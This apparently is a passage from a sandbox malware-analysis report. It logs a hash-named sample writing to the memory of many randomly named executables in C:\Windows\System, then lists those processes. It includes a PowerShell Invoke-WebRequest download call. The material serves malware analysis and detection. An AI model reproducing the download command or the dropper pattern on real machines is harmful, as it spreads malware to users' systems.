PID 2580 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\VbFWwuv.exe
PID 2580 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\VbFWwuv.exe
PID 2580 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\gKYaTiu.exe
PID 2580 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\gKYaTiu.exe
PID 2580 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\gKYaTiu.exe
PID 2580 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\YevrTTm.exe
PID 2580 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\YevrTTm.exe
PID 2580 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\YevrTTm.exe
PID 2580 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\MKdGMMI.exe
PID 2580 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\MKdGMMI.exe
PID 2580 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\MKdGMMI.exe
PID 2580 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\zXtHaPz.exe
PID 2580 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\zXtHaPz.exe
PID 2580 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\zXtHaPz.exe
PID 2580 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\aaWsMRc.exe
PID 2580 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\aaWsMRc.exe
PID 2580 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\aaWsMRc.exe
PID 2580 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\WaRAAUT.exe
PID 2580 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\WaRAAUT.exe
PID 2580 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\WaRAAUT.exe
PID 2580 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\utCiJhi.exe
PID 2580 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\utCiJhi.exe
PID 2580 wrote to memory of 672 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\utCiJhi.exe
PID 2580 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\EVqHuxE.exe
PID 2580 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\EVqHuxE.exe
PID 2580 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\EVqHuxE.exe
PID 2580 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\KTtPfRU.exe
PID 2580 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\KTtPfRU.exe
PID 2580 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\KTtPfRU.exe
PID 2580 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\jzneUsQ.exe
PID 2580 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\jzneUsQ.exe
PID 2580 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\jzneUsQ.exe
PID 2580 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\kAaBjcz.exe
PID 2580 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\kAaBjcz.exe
PID 2580 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\kAaBjcz.exe
PID 2580 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\GaUEMYy.exe
PID 2580 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\GaUEMYy.exe
PID 2580 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\GaUEMYy.exe
PID 2580 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\ASxtKPG.exe
PID 2580 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\ASxtKPG.exe
PID 2580 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\ASxtKPG.exe
PID 2580 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\uedThTv.exe
PID 2580 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\uedThTv.exe
PID 2580 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\uedThTv.exe
PID 2580 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\LlaYsrg.exe
PID 2580 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\LlaYsrg.exe
PID 2580 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\LlaYsrg.exe
PID 2580 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\HrvPhpR.exe
PID 2580 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\HrvPhpR.exe
PID 2580 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\HrvPhpR.exe
PID 2580 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\TmVgfRA.exe
PID 2580 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\TmVgfRA.exe
PID 2580 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\TmVgfRA.exe
PID 2580 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\rnSFVQL.exe
PID 2580 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\rnSFVQL.exe
PID 2580 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\rnSFVQL.exe
PID 2580 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\bqWZLju.exe
PID 2580 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\bqWZLju.exe
PID 2580 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\bqWZLju.exe
PID 2580 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\KEpLhzD.exe

Processes

C:\Windows\System32\sj0mxx.exe

"C:\Windows\System32\sj0mxx.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\VbFWwuv.exe

C:\Windows\System\VbFWwuv.exe

C:\Windows\System\gKYaTiu.exe

C:\Windows\System\gKYaTiu.exe

C:\Windows\System\YevrTTm.exe

C:\Windows\System\YevrTTm.exe

C:\Windows\System\MKdGMMI.exe

C:\Windows\System\MKdGMMI.exe

C:\Windows\System\zXtHaPz.exe

C:\Windows\System\zXtHaPz.exe

C:\Windows\System\aaWsMRc.exe

C:\Windows\System\aaWsMRc.exe

C:\Windows\System\WaRAAUT.exe

C:\Windows\System\WaRAAUT.exe

C:\Windows\System\utCiJhi.exe

C:\Windows\System\utCiJhi.exe

C:\Windows\System\EVqHuxE.exe

C:\Windows\System\EVqHuxE.exe

C:\Windows\System\KTtPfRU.exe

C:\Windows\System\KTtPfRU.exe

C:\Windows\System\jzneUsQ.exe

C:\Windows\System\jzneUsQ.exe

C:\Windows\System\kAaBjcz.exe

C:\Windows\System\kAaBjcz.exe

C:\Windows\System\GaUEMYy.exe

C:\Windows\System\GaUEMYy.exe

C:\Windows\System\ASxtKPG.exe

C:\Windows\System\ASxtKPG.exe

C:\Windows\System\uedThTv.exe

C:\Windows\System\uedThTv.exe

C:\Windows\System\LlaYsrg.exe

C:\Windows\System\LlaYsrg.exe

C:\Windows\System\HrvPhpR.exe

C:\Windows\System\HrvPhpR.exe

C:\Windows\System\TmVgfRA.exe

C:\Windows\System\TmVgfRA.exe

C:\Windows\System\rnSFVQL.exe

C:\Windows\System\rnSFVQL.exe

C:\Windows\System\bqWZLju.exe

C:\Windows\System\bqWZLju.exe

C:\Windows\System\KEpLhzD.exe

C:\Windows\System\KEpLhzD.exe

C:\Windows\System\PfiutKR.exe

C:\Windows\System\PfiutKR.exe

C:\Windows\System\ASSBonA.exe

C:\Windows\System\ASSBonA.exe

C:\Windows\System\SgLbZWG.exe

C:\Windows\System\SgLbZWG.exe

C:\Windows\System\qItLdOC.exe

C:\Windows\System\qItLdOC.exe

C:\Windows\System\wEGNKMO.exe

C:\Windows\System\wEGNKMO.exe

C:\Windows\System\IVZhjLr.exe

C:\Windows\System\IVZhjLr.exe

C:\Windows\System\BfKVuUN.exe

C:\Windows\System\BfKVuUN.exe

C:\Windows\System\fvzbwVd.exe

C:\Windows\System\fvzbwVd.exe

C:\Windows\System\nCszyir.exe

C:\Windows\System\nCszyir.exe

C:\Windows\System\zXipwxX.exe

C:\Windows\System\zXipwxX.exe

C:\Windows\System\QdvHMSJ.exe

C:\Windows\System\QdvHMSJ.exe

C:\Windows\System\WEbdvjp.exe

C:\Windows\System\WEbdvjp.exe

C:\Windows\System\hhVrNrT.exe

C:\Windows\System\hhVrNrT.exe

C:\Windows\System\ArVcZPU.exe

C:\Windows\System\ArVcZPU.exe

C:\Windows\System\LQAzWjt.exe

C:\Windows\System\LQAzWjt.exe

C:\Windows\System\fyZvrfP.exe

C:\Windows\System\fyZvrfP.exe

C:\Windows\System\EsKLCeE.exe

C:\Windows\System\EsKLCeE.exe

C:\Windows\System\gIbfqOh.exe

C:\Windows\System\gIbfqOh.exe

C:\Windows\System\FdcmxtP.exe

C:\Windows\System\FdcmxtP.exe

C:\Windows\System\mUuixjr.exe

C:\Windows\System\mUuixjr.exe

C:\Windows\System\mDDpkAG.exe

C:\Windows\System\mDDpkAG.exe

C:\Windows\System\UWhLGPG.exe

C:\Windows\System\UWhLGPG.exe

C:\Windows\System\xCXixqB.exe

C:\Windows\System\xCXixqB.exe

C:\Windows\System\RMTAcZi.exe

C:\Windows\System\RMTAcZi.exe

C:\Windows\System\zDmFTOj.exe

C:\Windows\System\zDmFTOj.exe

C:\Windows\System\BgnXxIA.exe

C:\Windows\System\BgnXxIA.exe

C:\Windows\System\zdqldAj.exe

C:\Windows\System\zdqldAj.exe

C:\Windows\System\gzBUXEc.exe

C:\Windows\System\gzBUXEc.exe

C:\Windows\System\UmzPkBD.exe

C:\Windows\System\UmzPkBD.exe

C:\Windows\System\IqaMLID.exe

C:\Windows\System\IqaMLID.exe

C:\Windows\System\bcKayvC.exe

C:\Windows\System\bcKayvC.exe

C:\Windows\System\VOFKMsm.exe

C:\Windows\System\VOFKMsm.exe

C:\Windows\System\RPROCMj.exe

C:\Windows\System\RPROCMj.exe

C:\Windows\System\gpcbPVb.exe

C:\Windows\System\gpcbPVb.exe

C:\Windows\System\tkidgaN.exe

C:\Windows\System\tkidgaN.exe

C:\Windows\System\sPDcOqI.exe

C:\Windows\System\sPDcOqI.exe

C:\Windows\System\aikhRbx.exe

C:\Windows\System\aikhRbx.exe

C:\Windows\System\DizUmCB.exe

C:\Windows\System\DizUmCB.exe

C:\Windows\System\NssZrzK.exe

C:\Windows\System\NssZrzK.exe

C:\Windows\System\dafBKxA.exe

C:\Windows\System\dafBKxA.exe

C:\Windows\System\Doerjdq.exe

C:\Windows\System\Doerjdq.exe

C:\Windows\System\KoTrUrY.exe

C:\Windows\System\KoTrUrY.exe

C:\Windows\System\THfvkIl.exe

C:\Windows\System\THfvkIl.exe

C:\Windows\System\gwlcakp.exe

C:\Windows\System\gwlcakp.exe

C:\Windows\System\mIcleIF.exe

C:\Windows\System\mIcleIF.exe

C:\Windows\System\oWKktWa.exe

C:\Windows\System\oWKktWa.exe

C:\Windows\System\XtjVxlC.exe

C:\Windows\System\XtjVxlC.exe

C:\Windows\System\KszGCCM.exe

C:\Windows\System\KszGCCM.exe

C:\Windows\System\wQxhYyM.exe

C:\Windows\System\wQxhYyM.exe

C:\Windows\System\cEvNAHQ.exe

C:\Windows\System\cEvNAHQ.exe

C:\Windows\System\KSDMqTb.exe

C:\Windows\System\KSDMqTb.exe

C:\Windows\System\YLsuJSS.exe

C:\Windows\System\YLsuJSS.exe

C:\Windows\System\AgdUtIv.exe

C:\Windows\System\AgdUtIv.exe

C:\Windows\System\YLdaKBk.exe

C:\Windows\System\YLdaKBk.exe

C:\Windows\System\jFKvTZM.exe

C:\Windows\System\jFKvTZM.exe

C:\Windows\System\VuUVOlw.exe

C:\Windows\System\VuUVOlw.exe

C:\Windows\System\pnxuhuE.exe

C:\Windows\System\pnxuhuE.exe

C:\Windows\System\vOcyPzN.exe

C:\Windows\System\vOcyPzN.exe

C:\Windows\System\lwBreKT.exe

C:\Windows\System\lwBreKT.exe

C:\Windows\System\AwRyVPD.exe

C:\Windows\System\AwRyVPD.exe

C:\Windows\System\TclkJbN.exe

C:\Windows\System\TclkJbN.exe

C:\Windows\System\PqrRdCz.exe

C:\Windows\System\PqrRdCz.exe

C:\Windows\System\WXXwzZG.exe

C:\Windows\System\WXXwzZG.exe

C:\Windows\System\ZwKKPaW.exe

C:\Windows\System\ZwKKPaW.exe

C:\Windows\System\fYtAyrl.exe

C:\Windows\System\fYtAyrl.exe

C:\Windows\System\mcGjLjJ.exe

C:\Windows\System\mcGjLjJ.exe

C:\Windows\System\kFMXCNV.exe

C:\Windows\System\kFMXCNV.exe

C:\Windows\System\ynNkKgM.exe

C:\Windows\System\ynNkKgM.exe

C:\Windows\System\tOXUpFo.exe

C:\Windows\System\tOXUpFo.exe

C:\Windows\System\vnUDxOW.exe

C:\Windows\System\vnUDxOW.exe

C:\Windows\System\PMkKFOK.exe

C:\Windows\System\PMkKFOK.exe

C:\Windows\System\ODsJZGR.exe

C:\Windows\System\ODsJZGR.exe

C:\Windows\System\wYCqzeW.exe

C:\Windows\System\wYCqzeW.exe

C:\Windows\System\uPxpwxE.exe

C:\Windows\System\uPxpwxE.exe

C:\Windows\System\KUMSNZW.exe

C:\Windows\System\KUMSNZW.exe

C:\Windows\System\djfGGEo.exe

C:\Windows\System\djfGGEo.exe

C:\Windows\System\oqTrxUX.exe

C:\Windows\System\oqTrxUX.exe

C:\Windows\System\JtqlNlF.exe

C:\Windows\System\JtqlNlF.exe

C:\Windows\System\cYuvHKh.exe

C:\Windows\System\cYuvHKh.exe

C:\Windows\System\BzXtCgm.exe

C:\Windows\System\BzXtCgm.exe

C:\Windows\System\ljMTmZl.exe

C:\Windows\System\ljMTmZl.exe

C:\Windows\System\HWzZZOc.exe

C:\Windows\System\HWzZZOc.exe

C:\Windows\System\SMGFUfC.exe

C:\Windows\System\SMGFUfC.exe

C:\Windows\System\oBDfzxI.exe

C:\Windows\System\oBDfzxI.exe

C:\Windows\System\YlaMqsF.exe

C:\Windows\System\YlaMqsF.exe

C:\Windows\System\TvmJLiK.exe

C:\Windows\System\TvmJLiK.exe

C:\Windows\System\ZOIzobF.exe

C:\Windows\System\ZOIzobF.exe

C:\Windows\System\sSsGXZy.exe

C:\Windows\System\sSsGXZy.exe

C:\Windows\System\mzZkFlV.exe

C:\Windows\System\mzZkFlV.exe

C:\Windows\System\peyrkuD.exe

C:\Windows\System\peyrkuD.exe

C:\Windows\System\IkHHvEq.exe

C:\Windows\System\IkHHvEq.exe

C:\Windows\System\BBebsMW.exe

C:\Windows\System\BBebsMW.exe

C:\Windows\System\kfQMbvR.exe

C:\Windows\System\kfQMbvR.exe

C:\Windows\System\BjUFcFV.exe

C:\Windows\System\BjUFcFV.exe

C:\Windows\System\JKPwuUy.exe

C:\Windows\System\JKPwuUy.exe

C:\Windows\System\XGqgGdF.exe

C:\Windows\System\XGqgGdF.exe

C:\Windows\System\xFEcMIX.exe

C:\Windows\System\xFEcMIX.exe

C:\Windows\System\yXWDgly.exe

C:\Windows\System\yXWDgly.exe

C:\Windows\System\bUgNaIy.exe

C:\Windows\System\bUgNaIy.exe

C:\Windows\System\yVuruEt.exe

C:\Windows\System\yVuruEt.exe

C:\Windows\System\GVkyjBT.exe

C:\Windows\System\GVkyjBT.exe

C:\Windows\System\MostECQ.exe

C:\Windows\System\MostECQ.exe

C:\Windows\System\NJgDQZv.exe

C:\Windows\System\NJgDQZv.exe

C:\Windows\System\BhIQtSl.exe

C:\Windows\System\BhIQtSl.exe

C:\Windows\System\KFecbdM.exe

C:\Windows\System\KFecbdM.exe

C:\Windows\System\tJnDQue.exe

C:\Windows\System\tJnDQue.exe

C:\Windows\System\ECjJsIW.exe

C:\Windows\System\ECjJsIW.exe

C:\Windows\System\jBalmHB.exe

C:\Windows\System\jBalmHB.exe

C:\Windows\System\OvXFgUT.exe

C:\Windows\System\OvXFgUT.exe

C:\Windows\System\WjYaPMa.exe

C:\Windows\System\WjYaPMa.exe

C:\Windows\System\UzNxyaG.exe

C:\Windows\System\UzNxyaG.exe

C:\Windows\System\WBkjJgD.exe

C:\Windows\System\WBkjJgD.exe

C:\Windows\System\UsUqRYW.exe

C:\Windows\System\UsUqRYW.exe

C:\Windows\System\ERxwRqa.exe

C:\Windows\System\ERxwRqa.exe

C:\Windows\System\EbSUrcU.exe

C:\Windows\System\EbSUrcU.exe

C:\Windows\System\nPrdhoh.exe

C:\Windows\System\nPrdhoh.exe

C:\Windows\System\cdfeCZG.exe

C:\Windows\System\cdfeCZG.exe

C:\Windows\System\hdtbzdk.exe

C:\Windows\System\hdtbzdk.exe

C:\Windows\System\xpuZMzb.exe

C:\Windows\System\xpuZMzb.exe

C:\Windows\System\MKbLPZx.exe

C:\Windows\System\MKbLPZx.exe

C:\Windows\System\qjlbSlZ.exe

C:\Windows\System\qjlbSlZ.exe

C:\Windows\System\buKFmXp.exe

C:\Windows\System\buKFmXp.exe

C:\Windows\System\IEdUDXH.exe

C:\Windows\System\IEdUDXH.exe

C:\Windows\System\JDSROmG.exe

C:\Windows\System\JDSROmG.exe

C:\Windows\System\cTkOLQd.exe

C:\Windows\System\cTkOLQd.exe

C:\Windows\System\NVZXYiH.exe

C:\Windows\System\NVZXYiH.exe

C:\Windows\System\ELcGLYz.exe

C:\Windows\System\ELcGLYz.exe

C:\Windows\System\egRjxoh.exe

C:\Windows\System\egRjxoh.exe

C:\Windows\System\yMlOwhX.exe

C:\Windows\System\yMlOwhX.exe

C:\Windows\System\ianMWsk.exe

C:\Windows\System\ianMWsk.exe

C:\Windows\System\GijEGac.exe

C:\Windows\System\GijEGac.exe

C:\Windows\System\JwGEduI.exe

C:\Windows\System\JwGEduI.exe

C:\Windows\System\rJikjIO.exe

C:\Windows\System\rJikjIO.exe

C:\Windows\System\rKNDzkN.exe

C:\Windows\System\rKNDzkN.exe

C:\Windows\System\tNlChZe.exe

C:\Windows\System\tNlChZe.exe

C:\Windows\System\vkutqDc.exe

C:\Windows\System\vkutqDc.exe

C:\Windows\System\NsJZyaj.exe

C:\Windows\System\NsJZyaj.exe

C:\Windows\System\hSZJoZv.exe

C:\Windows\System\hSZJoZv.exe

C:\Windows\System\ZDzTtaC.exe

C:\Windows\System\ZDzTtaC.exe

C:\Windows\System\eVEsPJd.exe

C:\Windows\System\eVEsPJd.exe

C:\Windows\System\onDAdXA.exe

C:\Windows\System\onDAdXA.exe

C:\Windows\System\HJkgIar.exe

C:\Windows\System\HJkgIar.exe

C:\Windows\System\JcUmlde.exe

C:\Windows\System\JcUmlde.exe

C:\Windows\System\YBTYVfI.exe

C:\Windows\System\YBTYVfI.exe

C:\Windows\System\tMPMcpZ.exe

C:\Windows\System\tMPMcpZ.exe

C:\Windows\System\eCLrwFt.exe

C:\Windows\System\eCLrwFt.exe

C:\Windows\System\IQPhGnd.exe

C:\Windows\System\IQPhGnd.exe

C:\Windows\System\ZBUYZbi.exe

C:\Windows\System\ZBUYZbi.exe

C:\Windows\System\afYFvrR.exe

C:\Windows\System\afYFvrR.exe

C:\Windows\System\HdqZYbq.exe

C:\Windows\System\HdqZYbq.exe

C:\Windows\System\teyigdH.exe

C:\Windows\System\teyigdH.exe

C:\Windows\System\YRwhxsZ.exe

C:\Windows\System\YRwhxsZ.exe

C:\Windows\System\oajDEdZ.exe

C:\Windows\System\oajDEdZ.exe

C:\Windows\System\AGwNAVT.exe

C:\Windows\System\AGwNAVT.exe

C:\Windows\System\agCHsbV.exe

C:\Windows\System\agCHsbV.exe

C:\Windows\System\ymsdWpn.exe

C:\Windows\System\ymsdWpn.exe

C:\Windows\System\WkMnbzw.exe

C:\Windows\System\WkMnbzw.exe

C:\Windows\System\DowPVBT.exe

C:\Windows\System\DowPVBT.exe

C:\Windows\System\TrUiHOd.exe

C:\Windows\System\TrUiHOd.exe

C:\Windows\System\aLosrAc.exe

C:\Windows\System\aLosrAc.exe

C:\Windows\System\THARDAq.exe

C:\Windows\System\THARDAq.exe

C:\Windows\System\kIYLtmo.exe

C:\Windows\System\kIYLtmo.exe

C:\Windows\System\ecMTopH.exe

C:\Windows\System\ecMTopH.exe

C:\Windows\System\qBhZvPt.exe

C:\Windows\System\qBhZvPt.exe

C:\Windows\System\bwWmNJe.exe

C:\Windows\System\bwWmNJe.exe

C:\Windows\System\HPITRmr.exe

C:\Windows\System\HPITRmr.exe

C:\Windows\System\URoVyYR.exe

C:\Windows\System\URoVyYR.exe

C:\Windows\System\ycYoctm.exe

C:\Windows\System\ycYoctm.exe

C:\Windows\System\kxaptyc.exe

C:\Windows\System\kxaptyc.exe

C:\Windows\System\jyaXBQf.exe

C:\Windows\System\jyaXBQf.exe

C:\Windows\System\ahtlQuu.exe

C:\Windows\System\ahtlQuu.exe

C:\Windows\System\oDGWjOY.exe

C:\Windows\System\oDGWjOY.exe

C:\Windows\System\OaxYRvy.exe

C:\Windows\System\OaxYRvy.exe

C:\Windows\System\xxrWEgu.exe

C:\Windows\System\xxrWEgu.exe

C:\Windows\System\kPTUpoQ.exe

C:\Windows\System\kPTUpoQ.exe

C:\Windows\System\srXVjxd.exe

C:\Windows\System\srXVjxd.exe

C:\Windows\System\MjvmAaC.exe

C:\Windows\System\MjvmAaC.exe

C:\Windows\System\UUokbeq.exe

C:\Windows\System\UUokbeq.exe

C:\Windows\System\yRspSLi.exe

C:\Windows\System\yRspSLi.exe

C:\Windows\System\yvNXbOP.exe

C:\Windows\System\yvNXbOP.exe

C:\Windows\System\hIIdPJK.exe

C:\Windows\System\hIIdPJK.exe

C:\Windows\System\sPcqfYs.exe

C:\Windows\System\sPcqfYs.exe

C:\Windows\System\OYWvjhx.exe

C:\Windows\System\OYWvjhx.exe

C:\Windows\System\UvUnfnW.exe

C:\Windows\System\UvUnfnW.exe

C:\Windows\System\aFWgXRo.exe

C:\Windows\System\aFWgXRo.exe

C:\Windows\System\eMVkbQz.exe

C:\Windows\System\eMVkbQz.exe

C:\Windows\System\wRrqYDO.exe

C:\Windows\System\wRrqYDO.exe

C:\Windows\System\FWPDECM.exe

C:\Windows\System\FWPDECM.exe

C:\Windows\System\mbhSjQO.exe

C:\Windows\System\mbhSjQO.exe

C:\Windows\System\nxHePBT.exe

C:\Windows\System\nxHePBT.exe

C:\Windows\System\hVKkxob.exe

C:\Windows\System\hVKkxob.exe

C:\Windows\System\gxaalYZ.exe

C:\Windows\System\gxaalYZ.exe

C:\Windows\System\diFfIsm.exe

C:\Windows\System\diFfIsm.exe

C:\Windows\System\GanaOdk.exe

C:\Windows\System\GanaOdk.exe

C:\Windows\System\asMThfb.exe

C:\Windows\System\asMThfb.exe

C:\Windows\System\UAnxVqG.exe

C:\Windows\System\UAnxVqG.exe

C:\Windows\System\KdvOppR.exe

C:\Windows\System\KdvOppR.exe

C:\Windows\System\wlUojkk.exe

C:\Windows\System\wlUojkk.exe

C:\Windows\System\qofRJMQ.exe

C:\Windows\System\qofRJMQ.exe

C:\Windows\System\QVGuqeE.exe

C:\Windows\System\QVGuqeE.exe

C:\Windows\System\wbfkucH.exe

C:\Windows\System\wbfkucH.exe

C:\Windows\System\iQAMeCt.exe

C:\Windows\System\iQAMeCt.exe

C:\Windows\System\GiUyAmS.exe

C:\Windows\System\GiUyAmS.exe

